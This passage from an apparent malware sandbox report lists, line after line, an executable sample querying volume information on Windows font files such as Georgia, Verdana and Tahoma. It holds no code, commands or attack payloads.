                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
